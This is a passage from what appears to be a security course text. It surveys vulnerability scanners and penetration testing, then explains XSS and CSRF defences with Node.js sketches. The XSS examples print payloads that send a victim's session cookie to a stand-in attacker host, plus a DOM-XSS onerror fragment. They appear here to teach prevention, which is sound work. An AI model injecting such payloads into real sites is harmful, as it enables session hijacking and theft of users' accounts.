regulations mandate regular security assessments for organizations
operating in the cloud. Cloud vulnerability scanners help you effortlessly
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors.
• Prioritization and Focus: Addressing Critical Issues First: Not all
vulnerabilities are created equal. Cloud vulnerability scanners prioritize
vulnerabilities based on their severity. This allows your security team to
focus their efforts on addressing the most critical issues first, optimizing
their remediation efforts.
The Cavalry Arrives: Types of Cloud Vulnerability Scanners
When it comes to cloud vulnerability scanners, there are two main types to
consider, each with its own strengths:
• Cloud-Native Scanners: Deep Insights, Seamless Integration: These
scanners are designed specifically for cloud environments. They integrate
seamlessly with major cloud providers like AWS, Azure, and GCP. This
deep integration allows them to offer unparalleled insights into your
cloud resources and configurations, providing a more comprehensive
view of your security posture.
• Agent-Based Scanners: Granular Visibility, Lightweight Footprint:
These scanners require the installation of a lightweight agent on each of
your cloud instances. This agent acts as the scanner's eyes and ears within
your cloud environment, continuously collecting detailed information
about the system's security posture. The agent then communicates this
information back to the scanner, providing a granular view of your cloud
security.
Choosing Your Champion: Selection Criteria for Optimal Defense
Selecting the right cloud vulnerability scanner depends on your specific needs
and cloud environment. Here are some key factors to consider when making
your choice:
• Cloud Compatibility: Ensuring Seamless Integration: Ensure the
scanner you choose integrates well with your chosen cloud platform.
Incompatibility can lead to difficulties and hinder the scanner's
effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense: The scanner
should cover a wide range of vulnerabilities, including network security
flaws, system misconfigurations, and web application vulnerabilities. A
comprehensive scanner ensures no security gaps remain exposed.
• Reporting and Alerting: Knowledge is Power, Real-Time Awareness
is Essential: The scanner should provide detailed reports that prioritize
vulnerabilities based on their severity and offer clear recommendations
for remediation. Additionally, real-time alerts for critical vulnerabilities
are essential for immediate response.
• Ease of Use: User-Friendly Interface for Optimal Efficiency: The
scanner's interface should be user-friendly and intuitive, even for those
without a deep security background. A simple and easy-to-use interface
empowers a wider range of users to leverage the scanner effectively.

HOST-BASED VULNERABILITY SCANNERS


In the never-ending battle for cybersecurity, host-based vulnerability scanners
emerge as our vigilant sentinels. They tirelessly patrol our servers, workstations,
and other network devices, identifying weaknesses and safeguarding them from
cyber threats. Let's embark on a deep dive into these essential tools, exploring
their intricate mechanisms, diverse applications, and the distinct variations
available.

Mechanism: A Multi-Pronged Approach to Uncovering Flaws

Imagine a security inspector meticulously examining every corner of a building, searching for vulnerabilities. Host-based vulnerability scanners function in a similar manner, employing a multi-pronged approach:

• Operating System and Software Scrutiny: Scanners meticulously examine the operating systems and software installed on a host. They compare the versions against a vast database of known vulnerabilities, identifying any outdated software or systems with known security flaws.
• Configuration Inspection: Unmasking Security Gaps
Misconfigurations create security gaps that attackers can exploit.
Scanners delve into the host's configuration settings, searching for
deviations from security best practices. These deviations can expose
vulnerabilities such as unnecessary open ports or weak password policies.
• Active Probing: Simulating an Attacker's Tactics Scanners don't just
sit passively. They actively probe the host, mimicking the tactics of
potential attackers. This involves techniques like port scanning and
vulnerability exploitation attempts (in a controlled manner) to identify
weaknesses that could be exploited in a real attack.
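As a rough illustration of the operating system and software scrutiny step described above, the following Node.js sketch compares an installed-software inventory against a small, hypothetical table of known-vulnerable versions (real scanners use large, continuously updated vulnerability databases):

    // Hypothetical software inventory collected from a host.
    const installed = { openssl: '1.0.2k', nginx: '1.25.3', bash: '4.3' };

    // Hypothetical extract of a vulnerability database: versions known to be affected.
    const knownVulnerable = {
      openssl: ['1.0.1f', '1.0.2k'],
      bash: ['4.3'],
    };

    for (const [pkg, version] of Object.entries(installed)) {
      if ((knownVulnerable[pkg] || []).includes(version)) {
        console.log(`VULNERABLE: ${pkg} ${version} matches a known-vulnerable version`);
      }
    }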
The Benefits: Fortifying Your Digital Defenses

Host-based vulnerability scanners offer a multitude of advantages, fortifying your digital defenses:

• Proactive Threat Detection: Patching Before a Breach: By proactively identifying vulnerabilities before attackers do, you gain a significant advantage. With this knowledge, you can promptly apply security patches and updates, significantly reducing the risk of a security breach.
• Improved Patch Management: Prioritization and Efficiency Patch
management can be a complex task. Host-based scanners prioritize
vulnerabilities based on their severity, allowing you to focus your
patching efforts on the most critical issues first. This optimizes your patch
management process and ensures your systems remain up-to-date.
• Enhanced Compliance: Meeting Regulatory Requirements Many
regulations mandate regular security assessments for organizations. Host-
based vulnerability scanners help you demonstrate compliance with these
regulations by providing detailed reports that can be presented to
auditors.
• Detection of Rogue Software and Unauthorized Modifications
Scanners can identify the presence of unauthorized or unapproved
software installed on a host. This can be a sign of malware infection or
unauthorized modifications by users.
The Reinforcements Arrive: Types of Host-Based Vulnerability Scanners

There are two main types of host-based vulnerability scanners to consider, each
with its own deployment strategy:

• Agent-Based Scanners: In-Depth Visibility with a Local Presence: These scanners require the installation of a lightweight agent on each host you want to scan. This agent continuously monitors the system's security posture and communicates detailed information back to a central scanner. This approach offers in-depth visibility into the host's security state.
• Agentless Scanners: Lightweight and Scalable, But Potentially Less
Detailed Agentless scanners don't require any software installation on the
target hosts. They leverage remote access protocols or network traffic
analysis to scan for vulnerabilities. While offering greater ease of
deployment and scalability, they may not provide the same level of
detailed information as agent-based scanners.
Choosing Your Champion: Selection Criteria for Optimal Security

Selecting the right host-based vulnerability scanner depends on your specific needs and IT environment. Here are some key factors to consider when making your choice:

• Operating System Compatibility: Ensuring Seamless Scans: Ensure the scanner you choose is compatible with the operating systems used on your hosts. Incompatibility can lead to difficulties and hinder the scanner's effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense The scanner
should cover a wide range of vulnerabilities, including operating system
flaws, software misconfigurations, and common security vulnerabilities.
A comprehensive scanner ensures no security gaps remain exposed.
• Reporting and Alerting: Knowledge is Power The scanner should
provide detailed reports that prioritize vulnerabilities based on their
severity and offer clear recommendations for remediation. Additionally,
real-time alerts for critical vulnerabilities are essential for immediate
response.
• Deployment Model: Agent-Based or Agentless? Consider the trade-off
between in-depth visibility (agent-based) and ease of deployment
(agentless) when choosing your scanner.
• Scalability: Addressing a Growing Network If you have a large and
growing network, consider the scanner's scalability to ensure it can
effectively scan all your hosts.

By employing host-based vulnerability scanners, you equip yourself with vigilant sentinels that tirelessly guard your network devices. With their keen eye for vulnerabilities, these tools empower you to proactively identify and address security weaknesses, creating a robust defense against cyber threats.
NETWORK-BASED VULNERABILITY SCANNERS

Keeping your network secure is a constant battle, like having a vigilant security guard patrolling
your neighborhood every night. Network-based vulnerability scanners act as
these digital guards, tirelessly scanning your network to identify potential entry
points for attackers. Let's delve deeper into how these scanners work, why
they're crucial for your network security, and explore the different types
available.
Under the Hood: How Network Scanners Spot Weaknesses
Imagine a security guard meticulously examining every house in your
neighborhood, checking for unlocked doors, broken windows, and flimsy
security systems. Network vulnerability scanners function similarly, employing
a multi-step process:
1. Network Mapping: Creating a Digital Blueprint: The scanner acts like
a cartographer, meticulously mapping your entire network. It identifies
and lists every device connected to your network, from computers and
servers to printers and even internet-of-things (IoT) devices. This
comprehensive map allows the scanner to understand the overall network
layout and identify potential vulnerabilities.
2. Seeing Like an Attacker: Mimicking Malicious Techniques: Scanners
don't just passively observe; they actively simulate attacker behavior.
They use techniques similar to what hackers might employ, such as port
scanning to identify open ports on devices. These open ports can act as
gateways for attackers to gain access to your network and launch attacks.
3. Scrutinizing Security Configurations: Checking Your Network's
Defenses: Just like a security guard checking the strength of door locks,
network scanners examine the security configurations of your network
devices. This includes aspects like password complexity, firewall rules,
and unnecessary services running on devices. Weak configurations create
security gaps that attackers can exploit to gain a foothold in your
network.
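As a simplified illustration of the port-scanning technique mentioned in step 2 above, this Node.js sketch (using only the built-in net module; the host and port list are illustrative, and you should only scan systems you are authorized to test) checks whether a few common ports accept connections:

    const net = require('net');

    // Illustrative target and ports; replace with authorized scan targets.
    const host = '192.0.2.10';
    const ports = [22, 80, 443, 3389];

    ports.forEach((port) => {
      const socket = new net.Socket();
      socket.setTimeout(2000);
      socket.once('connect', () => {
        console.log(`OPEN: ${host}:${port}`);
        socket.destroy();
      });
      socket.once('timeout', () => socket.destroy());
      socket.once('error', () => socket.destroy()); // closed or filtered port
      socket.connect(port, host);
    });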
The Benefits: Why Network Scanners are Essential
Network vulnerability scanners offer a multitude of advantages, acting as a
shield against cyber threats:
• Proactive Defense: Patching Before the Storm Breaks: By identifying
vulnerabilities before attackers do, you gain a significant advantage. With
this knowledge, you can take proactive measures such as applying
security patches and updating software. This significantly reduces the risk
of a security breach and safeguards your valuable data.
• Efficiency and Automation: Replacing Manual Drudgery: Manually
checking every device on your network for vulnerabilities is a time-
consuming and error-prone task. Network vulnerability scanners
automate the entire process, saving your IT security team valuable time
and resources. They can perform comprehensive scans at regular
intervals, ensuring your network's security posture remains constantly
monitored.
• Improved Compliance: Meeting Regulatory Requirements: Many
regulations in various industries mandate regular security assessments for
organizations. Network vulnerability scanners help you effortlessly
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors. These reports list the identified
vulnerabilities along with their severity levels, allowing you to prioritize
remediation efforts.
• Prioritization and Focus: Addressing Critical Issues First: Not all
vulnerabilities are created equal. Some pose a much higher threat than
others. Network vulnerability scanners prioritize vulnerabilities based on
their severity. This allows your security team to focus their efforts on
addressing the most critical issues first, optimizing their remediation
efforts and maximizing the network's overall security posture.
The Cavalry Arrives: Different Types of Network Scanners
When it comes to network vulnerability scanners, there are two main types to
consider, each with its own advantages:
• External Scanners: Simulating an Attacker's Perspective: These
scanners operate from outside your network, mimicking the tactics of an
external attacker attempting to gain unauthorized access. They provide a
valuable external perspective on your network security posture,
highlighting vulnerabilities that attackers might exploit. External scanners
are ideal for getting a general overview of your network's security from
an attacker's standpoint.
• Internal Scanners: Providing a Detailed View from Within: These
scanners operate from within your network, offering a more granular
view of vulnerabilities on individual devices. They can provide detailed
information about specific security configurations, software versions, and
potential weaknesses on each device. Internal scanners are essential for
getting a comprehensive understanding of your network's security from
the inside out.
Choosing Your Champion: Selection Criteria for Optimal Network
Security
Selecting the right network vulnerability scanner depends on your specific
network size, security needs, and technical expertise. Here are some key factors
to consider when making your choice:
• Network Size and Complexity: If you have a large and complex
network with hundreds or even thousands of devices, you'll need a
scanner that can handle the workload efficiently and scale to
accommodate future growth.
• Ease of Use and Reporting Features: The scanner's interface should be
user-friendly and intuitive, even for those without a deep security
background. Additionally, detailed reporting features are essential. The
reports should clearly list identified vulnerabilities, prioritize them based
on severity, and offer clear recommendations for remediation.
• Integration with Security Tools: Consider whether the scanner integrates well with your existing security tools, so that findings can feed directly into your remediation workflow.
DATABASE VULNERABILITY SCANNERS
In the digital realm, our databases are treasure troves of sensitive information.
Protecting them from unauthorized access and malicious attacks is paramount.
Database vulnerability scanners emerge as our digital guardians, meticulously
examining these data repositories for weaknesses that could be exploited. Let's
embark on a detailed exploration of these essential tools, delving into their
intricate mechanisms, diverse applications, and the distinct variations available.
Mechanism: A Keen Eye for Data Security Flaws
Imagine a security guard meticulously examining every vault within a bank.
Database vulnerability scanners function similarly, employing a multi-pronged
approach:
• Database Fingerprinting: Scanners act like security experts, first
identifying the specific type of database management system (DBMS)
you're using, such as MySQL, Oracle, or SQL Server. Understanding the
DBMS is crucial as vulnerabilities can differ between systems.
• Configuration Scrutiny: Misconfigurations are security nightmares for
databases. Scanners meticulously examine your database settings,
searching for deviations from security best practices. This includes
aspects like weak password policies, unnecessary user permissions, and
disabled auditing logs. These deviations can expose vulnerabilities that
attackers can exploit to gain unauthorized access or manipulate data.
• Query-Based Vulnerability Detection: Scanners don't just inspect
passively. They actively probe your database using specially crafted
queries. These queries mimic techniques that attackers might use to
identify vulnerabilities in the database structure or exploit weaknesses in
access controls.
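As a small illustration of configuration scrutiny, the sketch below lists the kind of checks a scanner might run against a MySQL server (the queries assume MySQL 5.7 or later; the check names and structure are illustrative, and a real scanner would execute each query through a database driver and evaluate the results):

    // Illustrative configuration checks a scanner might run against MySQL.
    const configChecks = [
      {
        name: 'Accounts with empty passwords',
        query: "SELECT user, host FROM mysql.user WHERE authentication_string = '';",
      },
      {
        name: 'Anonymous accounts',
        query: "SELECT user, host FROM mysql.user WHERE user = '';",
      },
      {
        name: 'Audit/general logging status',
        query: "SHOW VARIABLES LIKE 'general_log';",
      },
    ];

    // Here the checks are simply listed; a real scanner would run them and flag risky results.
    configChecks.forEach((c) => console.log(`[check] ${c.name}: ${c.query}`));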
The Benefits: Fortifying Your Database Defenses
Database vulnerability scanners offer a multitude of advantages, fortifying your
database defenses:
• Proactive Threat Detection: Patching Before a Breach By proactively
identifying vulnerabilities before attackers do, you gain a significant
advantage. With this knowledge, you can promptly apply security patches
and address configuration issues. This significantly reduces the risk of a
data breach and safeguards your sensitive information.
• Improved Database Security Posture: Scanners provide a
comprehensive assessment of your database's security posture,
highlighting areas of strength and weakness. This allows you to prioritize
security improvements and allocate resources effectively to fortify your
database defenses.
• Enhanced Compliance: Meeting Regulatory Requirements Many
regulations mandate regular security assessments for organizations that
handle sensitive data. Database vulnerability scanners help you
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors.
• Detection of Unauthorized Access Attempts: Scanners can identify
suspicious activity within your database, such as attempts to access
unauthorized data or escalate user privileges. This allows you to take
immediate action to investigate and prevent potential security breaches.
The Reinforcements Arrive: Types of Database Vulnerability Scanners
There are two main types of database vulnerability scanners to consider, each
with its own deployment method:
• Agent-Based Scanners: In-Depth Visibility with a Local Presence
These scanners require the installation of a lightweight agent on the
database server. This agent continuously monitors the database's security
posture and communicates detailed information back to a central scanner.
This approach offers in-depth visibility into the database's security state,
allowing for real-time monitoring and detection of suspicious activity.
• Agentless Scanners: Lightweight and Scalable, But Potentially Less
Detailed Agentless scanners don't require any software installation on the
database server. They leverage remote access protocols or analyze
database traffic to scan for vulnerabilities. While offering greater ease of
deployment and scalability, they may not provide the same level of
detailed information and real-time monitoring as agent-based scanners.
Choosing Your Champion: Selection Criteria for Optimal Security
Selecting the right database vulnerability scanner depends on your specific
needs and database environment. Here are some key factors to consider when
making your choice:
• Database Management System (DBMS) Compatibility: Ensure the
scanner you choose is compatible with the specific DBMS you're using.
Incompatibility can lead to difficulties and hinder the scanner's
effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense The scanner
should cover a wide range of database vulnerabilities, including
misconfigurations, SQL injection flaws, and weaknesses in access control
mechanisms. A comprehensive scanner ensures no security gaps remain
exposed.
• Reporting and Alerting: Knowledge is Power The scanner should
provide detailed reports that prioritize vulnerabilities based on their
severity and offer clear recommendations for remediation. Additionally,
real-time alerts for critical vulnerabilities are essential for immediate
response.
• Deployment Model: Agent-Based or Agentless? Consider the trade-off
between in-depth visibility and ease of deployment when choosing your
scanner. Agent-based scanners offer real-time monitoring but require
agent installation, while agentless scanners are easier to deploy but may
lack real-time capabilities.
By employing database vulnerability scanners, you equip yourself with vigilant
guardians that tirelessly protect your data troves. With their keen eye for
vulnerabilities, these tools empower you to proactively identify and address
security weaknesses, creating a robust defense against cyber threats.
EXTERNAL NETWORK PENETRATION TESTING

External Network Penetration Testing is designed to simulate attacks from outside the organization to identify vulnerabilities in the external-facing infrastructure. This testing helps ensure that systems accessible from the internet or other external networks are secure. The main areas of focus in external network penetration testing include:

1. Firewall Configuration Testing:


- Objective: Assess the firewall rules and configurations to ensure they are
correctly set up to block unauthorized access while allowing legitimate traffic.
- Method: Penetration testers review the firewall rules and policies, perform
penetration attempts to bypass the firewall, and identify any misconfigurations
or weaknesses.
- Outcome: Recommendations for strengthening firewall rules, improving
configurations, and closing any security gaps identified.

2. Internet Vulnerability Scanning:


- Objective: Identify vulnerabilities in services and applications exposed to the
internet.
- Method: Automated tools scan the organization’s public IP addresses and
domain names to detect open ports, exposed services, and known
vulnerabilities.
- Outcome: A detailed report of vulnerabilities, including their severity and
potential impact, along with recommended remediation steps.

3. Perimeter Network Testing:


- Objective: Assess the security of the network perimeter, including devices
and systems located just inside the external router.
- Method: Testers simulate attacks from an external attacker’s perspective to
identify vulnerabilities in the perimeter network, such as misconfigured devices,
unpatched systems, and weak security controls.
- Outcome: Insights into perimeter security weaknesses and guidance on
enhancing security measures.

4. Email Testing:
- Objective: Evaluate the security of email systems and identify vulnerabilities
that could be exploited.
- Method: Testers examine email servers, protocols (e.g., SMTP, IMAP,
POP3), and configurations to identify weaknesses such as open relays,
misconfigurations, and susceptibility to phishing or spoofing attacks.
- Outcome: Recommendations for securing email systems, improving
configurations, and mitigating identified risks.

5. Firewall Bypass Testing:


- Objective: Determine how resistant the firewall and associated systems are
to penetration attempts.
- Method: Testers attempt to exploit known vulnerabilities and
misconfigurations to bypass the firewall and gain unauthorized access.
- Outcome: Identification of firewall weaknesses and suggested improvements
to harden firewall defenses.

6. System Access via Modems:


- Objective: Identify vulnerabilities in modem connections that could provide
unauthorized access to internal systems.
- Method: Testers use tools to detect active modems and assess the security of
the connections they provide.
- Outcome: Identification of vulnerable modem connections and
recommendations for securing or disabling them.

7. Telephone Scanning:
- Objective: Detect unauthorized or insecure modems connected to the
organization’s phone lines.
- Method: Testers use techniques to scan phone lines for modem tones and
assess their security.
- Outcome: Identification of insecure modem connections and advice on
mitigating risks.
By performing external network penetration testing, organizations can
proactively identify and address vulnerabilities that could be exploited by
external attackers, thereby enhancing their overall security posture.

EXTERNAL VS INTERNAL PENETRATION TEST

INTERNAL NETWORK PENETRATION TESTING

Internal Network Penetration Testing focuses on evaluating the security of an organization’s internal IT environment to identify vulnerabilities that could be exploited by an attacker with some level of authorized access. This testing helps organizations understand the potential impact of insider threats or attackers who have already breached the external defenses. The main areas of focus in internal network penetration testing include:

1. Network Level Testing:


- Objective: Identify vulnerabilities in internal network services that could
allow unauthorized access or lateral movement within the network.
- Method: Testers scan and probe internal network devices, services, and
configurations to identify weaknesses such as open ports, unpatched systems,
and insecure protocols.
- Outcome: A report detailing network vulnerabilities, their potential impact,
and recommended remediation actions.

2. Computer Level Testing:


- Objective: Assess the security of operating systems and applications running
on networked devices.
- Method: Testers perform vulnerability scans, configuration reviews, and
exploit attempts on workstations, servers, and other networked devices.
- Outcome: Identification of security misconfigurations, unpatched
vulnerabilities, and insecure software installations, along with recommendations
for mitigation.

3. User Level Testing:


- Objective: Determine the potential impact of insider threats by testing the
access levels of different user roles.
- Method: Testers use valid user credentials to access systems and data,
simulating insider attacks to identify privilege escalation opportunities and
access control weaknesses.
- Outcome: Insights into user role-based vulnerabilities and guidance on
strengthening access controls and user permissions.

WEB APPLICATION PENETRATION TESTING

Web Application Penetration Testing is essential for identifying security vulnerabilities in web-based applications that could be exploited by attackers. This type of testing helps ensure that web applications are secure against common threats such as SQL injection, cross-site scripting (XSS), and other OWASP Top Ten vulnerabilities.
The main areas of focus in web application penetration testing include:

1. Unauthenticated Testing:
- Objective: Identify vulnerabilities that can be exploited without requiring
user authentication.
- Method: Testers use automated and manual techniques to probe the web
application’s public-facing components, such as login pages, forms, and APIs,
for security weaknesses.
- Outcome: Identification of unauthenticated vulnerabilities and
recommendations for securing public-facing components.

2. Authenticated Testing:
- Objective: Assess the security of the web application when accessed with
valid user credentials.
- Method: Testers log in to the application using various user roles and test for
privilege escalation vulnerabilities, insecure direct object references, and
weaknesses in authentication and authorization mechanisms.
- Outcome: Identification of authenticated vulnerabilities and guidance on
improving authentication and authorization controls.
WIRELESS PENETRATION TESTING

Wireless Penetration Testing evaluates the security of an organization’s Wi-Fi networks to ensure they are not vulnerable to attacks that could compromise the entire network. This testing helps organizations identify and address weaknesses in wireless security configurations and protocols.

The main areas of focus in wireless penetration testing include:

1. WLAN Security Audit:


- Objective: Simulate attacks against wireless authentication, encryption, and
network protocols to identify vulnerabilities.
- Method: Testers use tools to perform attacks such as MAC spoofing, WEP
cracking, WPA/WPA2 brute-forcing, and "man-in-the-middle" attacks.
- Outcome: A report detailing WLAN vulnerabilities and recommendations
for strengthening wireless security.

2. Rogue Access Point Testing:


- Objective: Detect unauthorized access points and assess their impact on
network security.
- Method: Testers set up rogue access points and monitor network traffic to
identify devices connecting to them and capture sensitive information.
- Outcome: Identification of rogue access points and recommendations for
preventing unauthorized devices from connecting to the network.

3. Configuration Review:
- Objective: Identify common configuration errors that could allow
unauthorized access to the wireless network.
- Method: Testers review wireless infrastructure configurations, including
SSIDs, encryption settings, and client profiles, to ensure they are secure.
- Outcome: Recommendations for correcting configuration errors and
improving wireless security.

By conducting wireless penetration testing, organizations can ensure their Wi-Fi networks are secure and resilient against attacks, protecting sensitive data and maintaining network integrity.

MOBILE APPLICATION PENETRATION TESTING

Mobile Application Penetration Testing is essential for ensuring the security of mobile applications, which are increasingly becoming targets for cyberattacks. This type of testing helps identify vulnerabilities in mobile apps that could be exploited to gain unauthorized access, steal sensitive data, or disrupt services. The main areas of focus in mobile application penetration testing include:

API Security Testing:


- Objective: Evaluate the security of backend APIs that the mobile application
communicates with.
- Method: Testers perform API testing to identify vulnerabilities such as
improper authentication, authorization issues, and insecure data handling. They
also check for potential injection attacks, such as SQL injection and command
injection.
- Outcome: Detailed findings on API security weaknesses and guidance on
securing API endpoints and implementing robust authentication and
authorization mechanisms.

Client-Side Security Testing:


- Objective: Identify vulnerabilities in the client-side logic of the mobile
application.
- Method: Testers analyze the app’s client-side functionality to find issues
such as insecure data storage, weak input validation, and exposure of sensitive
information through logs or error messages.
- Outcome: Recommendations for securing client-side operations, including
proper input validation and secure data storage practices.

Authentication and Authorization Testing:


- Objective: Assess the effectiveness of the mobile application’s
authentication and authorization mechanisms.
- Method: Testers attempt to bypass authentication, exploit weak passwords,
and test for issues such as insecure token handling and improper session
management.
- Outcome: Insights into authentication and authorization vulnerabilities and
suggestions for strengthening user access controls.

Reverse Engineering:
- Objective: Analyze the mobile application’s binary to understand its internal
logic and identify security weaknesses.
- Method: Testers use reverse engineering tools to decompile the app, analyze
the code, and identify potential vulnerabilities such as hardcoded credentials,
insecure cryptographic implementations, and obfuscation weaknesses.
- Outcome: A report on findings from reverse engineering and
recommendations for improving code obfuscation and securing sensitive
information within the app.

Device Security Testing:


- Objective: Evaluate how the mobile application interacts with the device and
ensure it does not compromise device security.
- Method: Testers assess the app’s permissions, use of device resources, and
interaction with other apps to identify issues such as excessive permissions,
insecure inter-app communication, and exploitation of device vulnerabilities.
- Outcome: Recommendations for securing device interactions, including
minimizing permissions and securing inter-app communication channels.

User Interface (UI) Security Testing:


- Objective: Ensure the mobile application’s UI does not introduce security
vulnerabilities.
- Method: Testers analyze the UI components for issues such as insecure input
fields, exposure of sensitive information, and susceptibility to UI manipulation
attacks like clickjacking.
- Outcome: Recommendations for securing the UI, including implementing
secure input handling and protecting sensitive information from being exposed.

By conducting thorough mobile application penetration testing, organizations can identify and address security vulnerabilities, ensuring their mobile apps are secure and protecting user data from potential attacks. This proactive approach helps maintain user trust and safeguards the organization’s reputation.
UNIT 5

CROSS-SITE SCRIPTING (XSS)

Cross-Site Scripting (XSS) vulnerabilities are common in web applications due to the dynamic nature of web content and the increasing amount of user interaction. XSS attacks exploit the fact that web applications execute scripts in users' browsers. If users can alter these scripts, it creates a security risk.
XSS attacks are categorized mainly into three types:

1. Stored XSS: The malicious script is stored on the server (e.g., in a database)
and executed when the data is retrieved and rendered by the browser.
2. Reflected XSS: The script is not stored on the server but is immediately
reflected back to the user as part of a response.
3. DOM-based XSS: The attack occurs entirely on the client side by
manipulating the Document Object Model (DOM).

Let's explore these types with examples and understand how each works and
how they can be mitigated.

Stored XSS

Stored XSS attacks involve injecting malicious scripts into a web application
where the data is stored (e.g., in a database) and later displayed to users
without proper sanitization.

Example:
A customer submits a support request on `support.mega-bank.com` including
HTML tags to emphasize text. If the application does not sanitize this input, it
stores the raw HTML. Later, when this comment is viewed by a customer
support representative, the HTML is rendered, potentially executing malicious
scripts.

Malicious Payload Example:
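An illustrative payload of the kind an attacker might submit in the support form (the attacker-controlled URL is fictitious):

    <script>
      // Sends the viewer's session cookie to an attacker-controlled server.
      new Image().src = 'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);
    </script>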

Mitigation:
- Sanitize Inputs: Ensure any user input is sanitized before storing it.
- Use Output Encoding: Encode output data so that any HTML or scripts are
treated as plain text.
- Content Security Policy (CSP): Implement CSP to restrict the sources from
which scripts can be executed.
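For example, a restrictive policy can be delivered as a response header along these lines (the exact directives must be tuned to the application):

    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'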

Reflected XSS

Reflected XSS occurs when user input is immediately included in the output
without being stored. This often happens in URL parameters, form
submissions, or HTTP headers.

Example:
A support portal search page (`support.mega-
bank.com/search?query=<script>alert('XSS')</script>`) includes the search
term in the page output. If the input is not sanitized, the script executes when
the search results page is rendered.

Malicious Payload Example:
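Decoded, the query parameter in the URL above carries a script; a more harmful variant (attacker URL fictitious) might look like this:

    <script>
      document.location = 'https://attacker.example/phish?c=' + encodeURIComponent(document.cookie);
    </script>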

Mitigation:
- Sanitize and Validate Inputs: Ensure all inputs are properly sanitized and
validated.
- Use Safe Methods to Display Data: Avoid using methods like `innerHTML`
that interpret and execute HTML and scripts.
- HTTP Headers: Use HTTP headers such as `X-XSS-Protection` to prevent
some types of XSS attacks.

DOM-based XSS

DOM-based XSS occurs when the client-side script manipulates the DOM and
insecurely handles data from user inputs.

Example:
A web application dynamically updates the content of a page using data from
the URL hash or query parameters. If these inputs are not properly sanitized,
an attacker can inject a script.

Malicious Payload Example:
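For instance, if the page copies the URL fragment into the DOM with innerHTML, a crafted link and the vulnerable client-side pattern might look like this (both illustrative):

    https://example.com/page#<img src=x onerror="alert(document.cookie)">

    // Vulnerable client-side code: renders the fragment without sanitization.
    document.getElementById('banner').innerHTML = decodeURIComponent(location.hash.slice(1));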


Mitigation:
- Secure JavaScript Code: Avoid using `document.write()` or `innerHTML`
with user inputs.
- Use Safe DOM Methods: Prefer methods that handle text content securely,
such as `textContent` or `createTextNode()`.
- Sanitize Data Before Use: Always sanitize and validate data from URL
parameters, hash values, or any other user-controllable sources.

Conclusion

XSS attacks pose significant risks to web applications, potentially leading to data theft, session hijacking, and other malicious activities. Understanding the types of XSS and implementing proper sanitization, output encoding, and security policies are crucial steps in protecting applications from these vulnerabilities. Regular security audits and staying updated with best practices are also essential in maintaining a secure web application environment.

DEFENDING AGAINST CSRF ATTACKS


Cross-Site Request Forgery (CSRF) attacks exploit a user's authenticated
session to make unauthorized requests on their behalf. These attacks can be
executed through various means, such as `<a>` links, `<img>` tags, and HTTP
POST requests using web forms. They are particularly dangerous because they
operate with the user's privileges and often go unnoticed by the user. This essay
outlines strategies for defending against CSRF attacks, ensuring user safety and
maintaining the integrity of web applications.

Understanding CSRF Attacks

CSRF attacks manipulate authenticated sessions to perform actions without the user's consent. For instance, clicking on a malicious link or loading a malicious image could trigger an unwanted request to the server. These requests appear legitimate to the server because they come from an authenticated session, making them hard to detect and prevent.

Header Verification
One of the primary defenses against CSRF attacks is verifying the origin of
requests using HTTP headers. Two headers are particularly useful:

- Origin Header: Sent with HTTP POST requests, it indicates the origin of the
request. An example of an origin header is `Origin: https://www.mega-
bank.com`.

- Referer Header: Sent with all requests, this header shows the URL of the
previous web page from which a link was followed. An example is `Referer:
https://www.mega-bank.com`.

By checking these headers against a list of trusted origins, servers can filter out
potentially malicious requests. For instance, a Node.js implementation might
look like this:
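A minimal Express-style sketch of this check (the trusted-origin list is illustrative):

    const express = require('express');
    const app = express();

    // Origins allowed to send state-changing requests.
    const trustedOrigins = ['https://www.mega-bank.com', 'https://support.mega-bank.com'];

    app.use((req, res, next) => {
      // Only state-changing methods need origin screening.
      if (['POST', 'PUT', 'PATCH', 'DELETE'].includes(req.method)) {
        const source = req.get('Origin') || req.get('Referer') || '';
        const trusted = trustedOrigins.some((origin) => source.startsWith(origin));
        if (!trusted) {
          return res.status(403).send('Request origin not trusted');
        }
      }
      next();
    });

    app.listen(3000);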

Limitations of Header Verification


While checking headers is a good first line of defense, it is not foolproof. If an
attacker compromises a trusted origin through Cross-Site Scripting (XSS), they
can bypass this check. Therefore, relying solely on header verification is
insufficient.

CSRF Tokens

CSRF tokens offer a robust defense mechanism. These tokens are unique per
session and user, significantly reducing the feasibility of successful CSRF
attacks. The process works as follows:

1. Token Generation: The server generates a unique token using cryptographic methods and sends it to the client.

2. Token Validation: Each request from the client must include this token. The
server validates the token to ensure it is correct, live, and unaltered.

An example implementation in a stateless API might include encrypting the token with user-specific information and a nonce, ensuring it remains valid for a limited time. The server decrypts and verifies the token upon receiving a request.
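A minimal sketch of one common variant, which binds the token to the session with an HMAC instead of encryption, using Node's built-in crypto module (the token format and expiry window are illustrative):

    const crypto = require('crypto');
    const SECRET = crypto.randomBytes(32); // server-side key; persist securely in practice

    // Issue a token bound to the user's session and an issue timestamp.
    function issueToken(sessionId) {
      const issuedAt = Date.now().toString();
      const mac = crypto.createHmac('sha256', SECRET)
        .update(`${sessionId}:${issuedAt}`)
        .digest('hex');
      return `${issuedAt}.${mac}`;
    }

    // Recompute the HMAC and confirm the token is recent and unaltered.
    function verifyToken(sessionId, token, maxAgeMs = 60 * 60 * 1000) {
      const [issuedAt, mac] = (token || '').split('.');
      if (!issuedAt || !mac) return false;
      if (Date.now() - Number(issuedAt) > maxAgeMs) return false;
      const expected = crypto.createHmac('sha256', SECRET)
        .update(`${sessionId}:${issuedAt}`)
        .digest('hex');
      if (mac.length !== expected.length) return false;
      return crypto.timingSafeEqual(Buffer.from(mac), Buffer.from(expected));
    }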

Best Practices for CSRF Prevention

Implementing effective CSRF defenses involves adopting best practices at both the design and coding levels:
1. Stateless GET Requests: GET requests should not alter server-side state.
They are susceptible to simple CSRF attacks via links or images. For example,
instead of using a GET request to update a user, separate retrieval and update
operations into distinct GET and POST requests, respectively.

2. Application-Wide CSRF Mitigation: Apply CSRF defenses uniformly across the application. This includes using middleware to check CSRF tokens and headers on all requests. An example middleware implementation might look like this:
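A sketch of such middleware (Express-style; verifyToken is the kind of helper sketched earlier, and req.session is assumed to come from session middleware):

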